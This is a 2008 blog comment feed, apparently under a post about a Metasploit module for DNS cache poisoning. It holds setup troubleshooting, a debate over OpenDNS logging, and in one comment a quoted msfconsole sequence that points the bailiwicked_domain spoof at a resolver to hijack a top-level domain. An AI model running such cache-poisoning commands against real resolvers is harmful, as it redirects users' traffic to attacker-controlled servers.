tag:blogger.com,1999:blog-25010298.post8402256842313656521..comments2009-05-05T19:27:15.039-07:00hdmhttp://www.blogger.com/profile/02163635320992069812noreply@blogger.comBlogger13125tag:blogger.com,1999:blog-25010298.post-9618450986079623132008-08-08T12:07:00.000-07:002008-08-08T12:07:00.000-07:00If it hasn't worked in about 5 minutes, something has gone wrong. Check the log files of the server, verify that the correct SRCPORT is used (or that its actually static). We have seen reports that BIND 9.2.x and 9.3.x are not working, but have not been able to confirm.hdmhttp://www.blogger.com/profile/02163635320992069812noreply@blogger.comtag:blogger.com,1999:blog-25010298.post-89685689435463074822008-08-08T11:57:00.000-07:002008-08-08T11:57:00.000-07:00huh thx hdm it works but not on my dns server. i was waiting 1 hour and metasploit still continountig process ... so it may takes years.. hmm maybe i have to slow computer? (p4 2.4 512mb ram)kusnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-32156728821516482002008-08-08T08:31:00.000-07:002008-08-08T08:31:00.000-07:00You need the SVN version (3.2-dev):<BR/>$ svn co http://metasploit.com/svn/framework3/trunkhdmhttp://www.blogger.com/profile/02163635320992069812noreply@blogger.comtag:blogger.com,1999:blog-25010298.post-80977196707104154782008-08-08T07:24:00.000-07:002008-08-08T07:24:00.000-07:00Hi, i install metasploit 3.1 on gentoo and when i copy bailiwicked_host to modules... and when i put "msfconsole" then on list of exploits,auxilities etc.. doesn't exists bailiwicked_host. What is wrong? sbd help?kusnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-37428191258653455732008-08-08T02:01:00.000-07:002008-08-08T02:01:00.000-07:00"You aren't clear about this behavior. I use OpenDNS and didn't know."<BR/><BR/>I use OpenDNS too, and I <I>did</I> know. It&#39;s not exactly hidden (Settings -&gt; Advanced Settings). I think the folks at OpenDNS are very clear about their operation, as their note on this subject (http://www.opendns.com/support/article/244) would appear to confirm.<BR/><BR/>&quot;And you can get a warrant with gag order to make you keep logs while nobody knows. This isn&#39;t good at all.&quot;<BR/><BR/>You can also disable the (limited) OpenDNS proxy, as outlined above. As for a warrant with gag order, the same could be said for everything you do while online, from your ISP to Google, and everything in between. If you&#39;re THAT concerned about your privacy, your only real solution would be to disconnect the Ethernet cable from your machine. Oh yeah... might want to watch what you check out from your local library too (http://www.ala.org/ala/washoff/woissues/civilliberties/theusapatriotact/usapatriotact.cfm)!Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-80621174755084693902008-08-03T17:43:00.000-07:002008-08-03T17:43:00.000-07:00AT&amp;T&#39;s network in Austin was acting up again last night (8/2). I noticed slow loading of graphics and some failures to resolve web addresses. Running a traceroute from my home machine to www.yahoo.com showed that 4 out of 5 traces went properly to the SBC/ATT hetwork, but around 20% were just randomly being directed (after my router) to various IP addresses in China, the Phillipines, Russian Federation, etc.<BR/><BR/>Almost 4 hours dealing with AT&amp;T tech support, and they were not acknowledging that there could be any network problems. I switched my router to use OpenDNS servers this morning and everything has been clear sailing all day.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-3808533983115860842008-07-31T13:46:00.000-07:002008-07-31T13:46:00.000-07:00Most, if not all, of the major telco/ISPs have proven that they&#39;ll log anything, and give up anything, at government request. I can&#39;t see where OpenDNS creates any more of a real or potential privacy issue than AT&amp;T, who have already proven they won&#39;t think twice about cooperating with the government to the detriment of their customers.Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-17918221574348143642008-07-31T04:09:00.000-07:002008-07-31T04:09:00.000-07:00The reason why Gov servers are slower than other nameservers apparently, is due to usually improper configuration, tricky/buggy SOA records that may only be cached a special way which does not follow the standards (in some cases), thus a lot of the Gov domains, is NOT supported without www. for some funny reason. :) (i find it quite hilarious that you can't reach all .Gov domains without www.)<BR/><BR/>Even worse is that within many SOA records on Gov and Mil domains, the responsible mail-address for the Nameserver is invalid, which makes it even harder to contact the responsible to fix it.MaXewww.intern0t.netnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-18887861267680890272008-07-31T01:06:00.000-07:002008-07-31T01:06:00.000-07:00@David Ulevitch<BR/><BR/>You aren't clear about this behavior. I use OpenDNS and didn't know.<BR/><BR/>And you can get a warrant with gag order to make you keep logs while nobody knows. This isn't good at all.<BR/><BR/>AleccoAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-42041227921946213352008-07-30T13:52:00.000-07:002008-07-30T13:52:00.000-07:00That was caused by a typo -- the run I did was against NET, but I managed to screw up the parameters and redid it as GOV. When I fixed the example, I forgot to fix the echo'd value for the DOMAIN. The module works fine against either, I just found the GOV one more entertaining (its also faster to pop than GOV for some reason, I think less nameservers).hdmhttp://www.blogger.com/profile/02163635320992069812noreply@blogger.comtag:blogger.com,1999:blog-25010298.post-39905234427330871482008-07-30T13:46:00.000-07:002008-07-30T13:46:00.000-07:00HDM, in your ddave post you paste:<BR/><BR/>msf &gt; use auxiliary/spoof/dns/bailiwicked_domain<BR/>msf auxiliary(bailiwicked_domain) &gt; set RHOST A.B.C.D<BR/>RHOST =&gt; A.B.C.D<BR/>msf auxiliary(bailiwicked_domain) &gt; set DOMAIN gov<BR/>DOMAIN =&gt; net<BR/>msf auxiliary(bailiwicked_domain) &gt; set SRCPORT 0<BR/>SRCPORT =&gt; 0<BR/>msf auxiliary(bailiwicked_domain) &gt; set NEWDNS msfdns.ath.cx<BR/>NEWDNS =&gt; msfdns.ath.cx <BR/><BR/>in set DOMAIN you set GOV and apeear NET<BR/><BR/>why?rafaelnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-46662212079682938152008-07-30T12:53:00.000-07:002008-07-30T12:53:00.000-07:00It takes 15 minutes to install dnscache. Once you install it you never have to touch or look at it again for most installations and it does not need patching.<BR/><BR/>http://cr.yp.to/djbdns.htmlAnonymousnoreply@blogger.comtag:blogger.com,1999:blog-25010298.post-66441778982631255422008-07-30T09:31:00.000-07:002008-07-30T09:31:00.000-07:00HD Moore,<BR/><BR/>OpenDNS does a lot more than just protect against this attack. It lets you decide what DNS you want to allow into your network, just like you&#39;d do with an anti-spam service for your mail server.<BR/><BR/>With regards to the Google redirect, it is done to solve some issues caused by newer versions of the Google toolbar. We do it in as clear a way as possible (hence the CNAME instead of just returning an IP).<BR/><BR/>We also make it easy to turn off just by going to &quot;Settings -&gt; Advanced Settings&quot; and unchecking the box for the proxy. 99.999% of people don&#39;t care, and for the few who do, that&#39;s why we make it as crystal clear as we do. And finally, we do not keep logs of ANY of the traffic that passes through it.David Ulevitchhttp://www.blogger.com/profile/04789441983097240175noreply@blogger.com